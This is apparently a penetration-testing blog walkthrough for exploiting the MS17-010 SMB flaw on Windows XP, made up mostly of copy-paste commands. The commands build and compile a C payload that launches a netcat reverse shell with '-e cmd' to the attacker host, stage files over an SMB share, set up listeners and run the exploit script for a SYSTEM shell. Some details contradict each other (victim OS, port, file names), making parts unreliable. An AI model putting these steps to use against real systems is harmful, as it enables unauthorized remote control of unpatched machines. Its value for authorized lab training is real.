Exploit Eternal Blue (MS17–010) for Windows XP with custom payload
Summary
This article shows you how to exploit the MS17–010 vulnerability on Windows XP .
Disclaimer
This article is for informational and educational purposes only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.
Details
Why this post?
During my OSCP training I had a lot of trouble rooting XP target ‘Xlicx in Wonderland’. After many hours of troubleshooting, it finally worked. I would like to save others from wasting precious lab time.
This walkthrough has been prepared in such a way that it should always work on any system running on Windows XP or Windows 2000 ('JD') and vulnerable for MS17–010.
Our final payload will be an executable file that:
- will setup a netcat reverse shell (port 8080)
The POC consists of two machines: the victim (Windows 7 64bits) and an attacker machine (Kali Linux 2022.1).
victim:
- Windows XP Professional SP3
- IP address: 192.168.62.149
- Security: Default Windows firewall = ON
- File and Print sharing = enabled
Attacker (for reverse shell):
- Kali Linux
- IP-Address: 192.168.62.161
In this guide I use the term 'kali' and 'LHOST interchangeably (we will use variables ‘kali’ or ‘LHOST’). You can change this address to your needs and copy + paste the code inside a Bash Terminal.
Prerequisites
We start by installing preconditions that must be in place before we can run the exploit.
1. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Download and install the latest version of Impacket. Set the directory world-writable (yes, this is necessary).
cd /opt
sudo git clone https://github.com/SecureAuthCorp/impacket.git
sudo chmod 777 /opt/impacket -R
2. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Install the virtualenv tool.
sudo apt install virtualenv
3. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Start a python2 virtual enviroment inside the Impacket directory
cd /opt/impacket
sudo virtualenv impacket-venv -p $(which python2)
source impacket-venv/bin/activate
Result: you should have a prompt changed to ‘(impacket-venv)’.
4. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Inside the python2 virtual environment ‘(impacket-venv)’, install pip for python2
cd /tmp
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py -O /tmp/get-pip.py --no-check-certificate
sudo python2 get-pip.py
5. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Inside the python2 virtual environment ‘(impacket-venv)’, install Impacket requirements.
cd /opt/impacket
pip install -r requirements.txt
pip install .
Enumeration.
Now that you have updated your system with the requirements to run the exploit, you can start scanning the target machine (Windows XP in our case).
1. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Use nmap to scan the target machine for SMB vulnerabilities.
cd /usr/share/nmap/scripts
target=192.168.62.149
p=445
scriptargs='smbpass=','smbdomain=mydomain.com','unsafe=1'
for script in $(ls smb* | grep -v -e brute -e flood); do echo "=== $script ==="; sudo nmap $(echo $target) -script=$script -script-args="${scriptargs}" -p $p| grep "|" ; done
Our target machine is vulnerable for MS17–010!
Payload creation (for Windows XP)
Our final payload will be an executable file that:
- Will setup a netcat reverse shell (port 443)
Everything we need to run the exploit is copied to the /tmp directory on Kali. This directory will be made available with the Python simple HTTP Server.
7. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Copy and paste the C code below to create source file /tmp/backup.c. Adjust the value for 'kali=' to your Kali IP-address.
kali=192.168.62.161
portnc2=8080cd /tmp
echo '#include <stdlib.h>'> testexe.c
echo 'int main ()' >> testexe.c
echo '{' >> testexe.c
echo 'int i;' >> testexe.c
echo i = system \(\"START /B \\\\\\\\\\\\\\$kali\\\\\\smb\\\\\\\\nc.exe $kali $portnc2 -e cmd\"\)\; >> testexe.c
echo 'return 0;' >> testexe.c
echo '}' >> testexe.c
Result is source file /tmp/testexe.c
8. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Compile /tmp/testexec.c to /tmp/ruby.exe (ruby-xp.exe is arbitriary, it can be something else if you want).
/usr/bin/i686-w64-mingw32-gcc /tmp/testexe.c -o /tmp/ruby-xp.exe
/usr/bin/i686-w64-mingw32-strip /tmp/ruby-xp.exe
You have now created a Windows payload file. The next steps are to prepare the related files that will be called by the payload file (ruby-xp.exe).
Netcat reverse shell payload
Our final payload file (ruby.exe) will setup a netcat reverse shell on TCP port 8080. This is done by the following lines of code:
i = system (“START /B \\\\192.168.62.161\\smb\\nc.exe 192.168.62.161 8080 -e cmd”);
9. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Copy netcat to staging directory (/tmp)
cp /usr/share/windows-resources/binaries/nc.exe /tmp
Set up the required listeners
Next open a new instance of Bash Terminal. Open a new tab for each “listener”. You will need 5 open tabs for all required listeners.
10. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Set up a SMB stager in order to download essential files to the target.
sudo impacket-smbserver -ip 192.168.62.161 -port 445 smb /tmp/
11. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Start a netcat listener on port 8080to catch the netcat connection
rlwrap nc -nlvp 8080
Prepare MS17–010 exploit
We have now made our preparations for the payload. The next section is about running the actual exploit. Open a new Bash Terminal instance to execute the commands.
12. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Download the exploit.
cd /tmp
git clone https://github.com/helviojunior/MS17-010.git
13. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Start a Python2 environment inside the Impacket folder
cd /opt/impacket
sudo virtualenv impacket-venv -p $(which python2)
source impacket-venv/bin/activate
14. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Inside the Python2 environment ‘(impacket-venv)’, run the exploit against our target (192.168.62.149) with our payload file (/tmp/ruby-xp.exe).
python2 /tmp/MS17-010/send_and_execute.py 192.168.62.149 /tmp/ruby-xp.exe
Check out our results:
SMB listener
An SMB connection is established.
Netcat listener
We have a SYSTEM shell!
In my next blog, I will focus more on exploiting Active Directory. I will show you how to use PowerShell Empire as alternative for mimikatz.